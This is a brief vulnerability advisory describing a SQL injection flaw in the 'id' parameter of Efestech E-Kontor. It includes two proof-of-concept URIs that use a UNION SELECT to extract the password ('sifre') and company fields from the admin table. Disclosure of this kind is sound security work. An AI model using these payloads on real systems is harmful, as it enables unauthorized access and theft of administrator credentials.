|
Efestech E-Kontor 'id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following proof-of-concept URIs are available: http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1 http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1 |
|
|
Privacy Statement |